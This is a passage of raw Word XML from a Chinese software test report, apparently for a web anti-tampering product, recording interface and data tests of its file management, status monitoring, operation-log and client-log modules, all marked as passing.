          <w:p w14:paraId="1358BAA7"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4DFD60D3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>文件管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A4A8DBF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F71D0BE"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4C621849" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看文件目录历史版本，停用、启用文件目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="569D4637" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492CC170"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5505B27D"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2CE811D0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9B9FE4"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6F51EDF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看主机列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35229AB5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="13E030D2" wp14:editId="1ABDB624">
                  <wp:extent cx="4199890" cy="1244600"/>
                  <wp:effectExtent l="0" t="0" r="16510" b="0"/>
                  <wp:docPr id="5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61"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199890" cy="1244600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B95EF58" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击节点，查看文件目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120BB16D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7B015259" wp14:editId="7CC12746">
                  <wp:extent cx="4193540" cy="933450"/>
                  <wp:effectExtent l="0" t="0" r="22860" b="6350"/>
                  <wp:docPr id="5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62"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4193540" cy="933450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A26DC0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看历史版本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23593FB6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="190CADE1" wp14:editId="1677578C">
                  <wp:extent cx="4195445" cy="3826510"/>
                  <wp:effectExtent l="0" t="0" r="20955" b="8890"/>
                  <wp:docPr id="5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63"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4195445" cy="3826510"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="31EDDE3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>停用、启用目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D73C20D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7B666248" wp14:editId="21D56EDA">
                  <wp:extent cx="4191000" cy="1153795"/>
                  <wp:effectExtent l="0" t="0" r="0" b="14605"/>
                  <wp:docPr id="5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64"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4191000" cy="1153795"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="04AA8DAB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E002F07"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481910E9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看历史版本，停用、启用目录成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="37967F92" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E09967D"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70DF0A2E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23A8DD6E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="_Toc201835704"/>
      <w:bookmarkStart w:id="330" w:name="_Toc517288751"/>
      <w:bookmarkStart w:id="331" w:name="_Toc3552452"/>
      <w:bookmarkStart w:id="332" w:name="_Toc501754576"/>
      <w:bookmarkStart w:id="333" w:name="_Toc36487946"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防篡改状态监视模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
      <w:bookmarkEnd w:id="330"/>
      <w:bookmarkEnd w:id="331"/>
      <w:bookmarkEnd w:id="332"/>
      <w:bookmarkEnd w:id="333"/>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4E7A77C7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20439330"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5B726430" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>防篡改状态监视模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0B00024C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B51EE2D"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212B08DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0E9478B1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A64C254"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267FC425"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1B0934B6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70E6C915"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60BD1FF7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看目标</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>主机上的防篡改服务状态，运行状态包括正常和心跳超时等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528031F4"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114300" distR="114300" wp14:anchorId="140A5D11" wp14:editId="6CA10DAB">
                  <wp:extent cx="4192270" cy="2181860"/>
                  <wp:effectExtent l="0" t="0" r="24130" b="2540"/>
                  <wp:docPr id="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65"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4192270" cy="2181860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="150CD181" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B37E024"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399E9D7F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="59B49D8B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27CDF677"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2374FA57" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="010CB158" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="334" w:name="_Toc36487947"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户操作日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33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66B0FB85" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EFC3A42"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0D53E626" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户操作日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="64D4B24F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EAE149B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67593860" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2017DB45" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EC96F11"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20B6CE5F"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34F4AA0B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E43A7DA"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148B4278" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>防篡改服务的操作日志查看功能。主要包含用户的启动/暂停根目录保护，新增、删除、移动和重命名等操作记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D81BB2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799657AC" wp14:editId="17AE59BF">
                  <wp:extent cx="5278120" cy="2480310"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="889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6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5278120" cy="2480310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1AE05453" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="292C45A8"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227919D2"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Style w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7D816459" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0FAF1F"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13BE103B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67F39E05" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="_Toc36487948"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端防篡改日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="335"/>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0F4D466B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0802110B"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525483B3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>客户端防篡改日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="47D1A5D4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="229328ED"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0295CC77" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
